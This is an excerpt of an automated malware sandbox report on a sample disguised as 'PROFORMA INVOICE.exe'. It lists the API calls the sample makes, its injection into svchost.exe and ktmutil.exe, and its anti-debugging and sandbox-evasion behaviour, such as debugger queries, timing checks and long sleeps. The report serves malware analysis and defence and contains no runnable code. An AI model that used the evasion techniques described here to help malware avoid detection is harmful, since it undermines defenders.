Code function: 0_2_00F8123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00F8123A

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	API/Special instruction interceptor: Address: 17DDE84
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\ktmutil.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_03A7096E rdtsc

1_2_03A7096E

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Evaded block: after key decision			graph_0-93847
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Evaded block: after key decision			graph_0-94711

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-94244

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	API coverage: 4.5 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\ktmutil.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\ktmutil.exe TID: 6740	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe TID: 6740	Thread sleep time: -86000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe TID: 2836	Thread sleep time: -55000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe TID: 2836	Thread sleep time: -43500s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\ktmutil.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ktmutil.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FA6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00FA6CA9
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FA60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_00FA60DD
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FA63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_00FA63F9
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FAEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FAEB60
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FAF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00FAF5FA
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FAF56F FindFirstFileW,FindClose,	0_2_00FAF56F
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FB1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FB1B2F
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FB1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FB1C8A
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FB1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FB1F94
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 5_2_02A2C810 FindFirstFileW,FindNextFileW,FindClose,	5_2_02A2C810

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00F7DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F7DDC0

Source: qWxlULNrWdo.exe, 00000008.00000002.3556251210.0000000000C50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: ktmutil.exe, 00000005.00000002.3555301986.0000000002C33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
Source: firefox.exe, 00000009.00000002.2266395982.000001C5860AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

API call chain: ExitProcess graph end node

graph_0-93634

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_03A7096E rdtsc

1_2_03A7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00417A83 LdrLoadDll,

1_2_00417A83

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FB6AAF BlockInput,

0_2_00FB6AAF

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00F63D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00F63D19

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00F93920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00F93920

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00F7E01E LoadLibraryA,GetProcAddress,

0_2_00F7E01E

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_017DE150 mov eax, dword ptr fs:[00000030h]	0_2_017DE150
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_017DE0F0 mov eax, dword ptr fs:[00000030h]	0_2_017DE0F0
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_017DCAF0 mov eax, dword ptr fs:[00000030h]	0_2_017DCAF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]	1_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]	1_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]	1_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5438F mov eax, dword ptr fs:[00000030h]	1_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5438F mov eax, dword ptr fs:[00000030h]	1_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]	1_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]	1_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]	1_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A663FF mov eax, dword ptr fs:[00000030h]	1_2_03A663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEC3CD mov eax, dword ptr fs:[00000030h]	1_2_03AEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]	1_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]	1_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]	1_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]	1_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB63C0 mov eax, dword ptr fs:[00000030h]	1_2_03AB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE3DB mov eax, dword ptr fs:[00000030h]	1_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE3DB mov eax, dword ptr fs:[00000030h]	1_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]	1_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE3DB mov eax, dword ptr fs:[00000030h]	1_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	1_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	1_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B08324 mov eax, dword ptr fs:[00000030h]	1_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B08324 mov ecx, dword ptr fs:[00000030h]	1_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B08324 mov eax, dword ptr fs:[00000030h]	1_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B08324 mov eax, dword ptr fs:[00000030h]	1_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]	1_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]	1_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]	1_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2C310 mov ecx, dword ptr fs:[00000030h]	1_2_03A2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A50310 mov ecx, dword ptr fs:[00000030h]	1_2_03A50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD437C mov eax, dword ptr fs:[00000030h]	1_2_03AD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]	1_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]	1_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]	1_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB035C mov ecx, dword ptr fs:[00000030h]	1_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]	1_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]	1_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFA352 mov eax, dword ptr fs:[00000030h]	1_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD8350 mov ecx, dword ptr fs:[00000030h]	1_2_03AD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B0634F mov eax, dword ptr fs:[00000030h]	1_2_03B0634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A402A0 mov eax, dword ptr fs:[00000030h]	1_2_03A402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A402A0 mov eax, dword ptr fs:[00000030h]	1_2_03A402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]	1_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E284 mov eax, dword ptr fs:[00000030h]	1_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E284 mov eax, dword ptr fs:[00000030h]	1_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]	1_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]	1_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]	1_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]	1_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]	1_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]	1_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B062D6 mov eax, dword ptr fs:[00000030h]	1_2_03B062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2823B mov eax, dword ptr fs:[00000030h]	1_2_03A2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]	1_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]	1_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]	1_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2826B mov eax, dword ptr fs:[00000030h]	1_2_03A2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB8243 mov eax, dword ptr fs:[00000030h]	1_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB8243 mov ecx, dword ptr fs:[00000030h]	1_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B0625D mov eax, dword ptr fs:[00000030h]	1_2_03B0625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2A250 mov eax, dword ptr fs:[00000030h]	1_2_03A2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36259 mov eax, dword ptr fs:[00000030h]	1_2_03A36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEA250 mov eax, dword ptr fs:[00000030h]	1_2_03AEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEA250 mov eax, dword ptr fs:[00000030h]	1_2_03AEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A70185 mov eax, dword ptr fs:[00000030h]	1_2_03A70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEC188 mov eax, dword ptr fs:[00000030h]	1_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEC188 mov eax, dword ptr fs:[00000030h]	1_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD4180 mov eax, dword ptr fs:[00000030h]	1_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD4180 mov eax, dword ptr fs:[00000030h]	1_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]	1_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]	1_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]	1_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]	1_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]	1_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]	1_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]	1_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B061E5 mov eax, dword ptr fs:[00000030h]	1_2_03B061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A601F8 mov eax, dword ptr fs:[00000030h]	1_2_03A601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF61C3 mov eax, dword ptr fs:[00000030h]	1_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF61C3 mov eax, dword ptr fs:[00000030h]	1_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A60124 mov eax, dword ptr fs:[00000030h]	1_2_03A60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]	1_2_03ADE10E
